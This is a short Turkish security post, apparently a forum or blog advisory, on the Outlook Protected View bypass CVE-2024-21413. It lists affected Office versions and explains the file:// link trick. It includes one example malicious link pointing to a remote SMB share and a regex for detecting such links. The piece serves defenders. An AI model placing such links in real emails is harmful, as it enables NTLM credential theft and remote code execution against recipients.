Merhabalar, CVE-2024-21413 güvenlik açığı giderilmiş olmasına rağmen aşağıda belirtilen uygulamalarda 07.02.2025 tarihinde aşağıda belirtilen yöntem ile tekrar kullanılabilir olmuştur.
Microsoft Office LTSC 2021
Microsoft 365 Apps for Enterprise
Microsoft Outlook 2016
Microsoft Office 2019
Saldırganlar, bu güvenlik açığını kullanarak Outlook’un Protected View (Korunan Görünüm) özelliğini atlatabiliyor. Normalde, Office dosyaları yalnızca okunur modda açılarak zararlı içeriklerin çalıştırılması engellenir, ancak bu hata nedeniyle dosyalar düzenleme modunda açılabiliyor.
Açık, file:// protokolü ile e-posta içine gömülü bağlantılar aracılığıyla kötüye kullanılabiliyor.
URL’ye bir ünlem işareti (!) ve rastgele bir metin ekleyerek Outlook’un güvenlik kontrollerini aşmak mümkün oluyor.
Örnek bir bağlantı:file:///\10.10.111.111\test\test.rtf!something
Bu zafiyet ile;
NTLM kimlik bilgileri çalınabilir.
Kötü amaçlı Office dosyaları çalıştırılarak uzaktan kod yürütme (RCE) gerçekleştirilebilir.
En kesin çözüm Microsoft tarafından gelecek patch olsa da bu güncelleme gelene kadar gelen maillere bu saldırıya özel bir regex uygulamak ekstra bir güvenlik katmanı oluşturabilir.
Örnek bir regex: file:\/\/[^\s]+!\w+
NTLM kimlik doğrulamasını devre dışı bırakmakta diğer bir önlem olabilir.
Sizlerden gelecek önerileri de bekliyorum.
Haber Kaynağı:
https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-microsoft-outlook-now-exploited-in-attacks/
CISA:
https://www.cve.org/CVERecord?id=CVE-2024-21413
Bir yanıt yazın